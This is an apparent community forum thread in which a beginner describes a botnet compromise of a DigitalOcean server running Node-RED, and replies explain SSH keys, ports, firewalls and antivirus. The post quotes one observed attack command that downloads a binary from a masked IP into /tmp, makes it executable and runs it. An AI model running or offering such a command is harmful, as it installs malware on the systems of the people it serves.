Server hacked - is Node-Red an entry point and how to prevent this?

Hi community,
My server running on Digitalocean has been hacked around October, most likely by a bot net (google: . This thing is used for DDOS as far as I understand but you never know what else has been changed...

I realized because I saw many commands similar to the one below in the command line:
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS ; chmod +x php; ./php; rm -rf php"
If you saw things like this, you have also been hacked. It seems like I have not been the only one, especially in the Node-Red community:

URLhaus | Checking your browser seems to be DO specific problem or for node-red users?
Openhab Servers potential target for attacs - hack - openHAB Community

Could it be that hackers just looked for an entry point scanning Node_red: ports ?

So I am a beginner in IT like many others here and the topics I found on this forum are in my view rather professional level. Digitalocean told me to scrap the instance which I will do but its a major pain since I run node-red, Grafana, InfluxDB etc. on it so setting it all up again is a good day+ of work.

My questions since I am rather new to IT security:

  • Can anyone recommend an entry level guide to IT security on hosted servers like Digitalocean where I don't need to spend days to understand the keywords and what I need to do?
  • Digitalocean wrote me that: "your Droplet does have password authentication enabled. Password-based authentication lacks a strong identity check and no one wants hackers to launch a brute force attack to hack into your server, so it's a good practice to disable password authentication in the OpenSSH server. " Doesn't make sense to me, can someone explain that? I understand the brute force part but wouldn't it make more sense to just have a very complex password instead of having none?
  • Sorry, very beginner question but I red in this forum that its dangerous to leave a port open. On a hosted server with node-red running, what does it mean to open and close a port?
  • Digitalocean recommended to used clamAV and the freshclam library but then again I couldn't do it because it said "database load killed by Signal 9" which could refer that my instance has not enough RAM to execute that, anyone has had and overcome this problem?

Many thanks here, it seems that around last October a rather large attack was happening and I guess many early users like me aren't aware that this happened. Would be great to have a simple guide on how to avoid this to have it never happen again.

Short answer is that it quite difficult to run your own secure cloud server and it is not something a beginner should do.

There is plenty of guidance on the forum, in the docs and elsewhere about running node-red securely when open to the Internet.

But this isn't really a Node-RED issue as such. Nobody should be opening up a service or server to the Internet without knowing what they are doing, it is a recipe for disaster.

You should now rebuild your Pi from scratch since you don't know what the attackers have done to it.

In the future, make sure you understand the consequences and requirements of setting up an Internet-facing service before starting.

No. You DO need to spend days understanding things.

A stronger password is better than a weak one of course. But they are suggesting that you use certificate-based SSH authentication which is much stronger still.

TCP/IP is the protocol for networking over the Internet. It uses addresses and ports to identify channels of communication. Many common services have standard ports. For example, the web (HTTP/HTTPS) typically uses Port 80 for HTTP and Port 443 for HTTPS.

You can use a local firewall on a Droplet to ensure that only specific ports are open. You could also use it to change default ports. For example, SSH runs on Port 22 but an internet-facing service will start being attacked on that port within seconds of appearing on the Internet - so better to change the externally facing port to something else.

AV = Anti-Virus. Good for protecting the data files on your server but not much else.

Some of what you need to know is contained in this FAQ post, containing advice on how to safely access node-red over the internet.

This topic was automatically closed 60 days after the last reply. New replies are no longer allowed.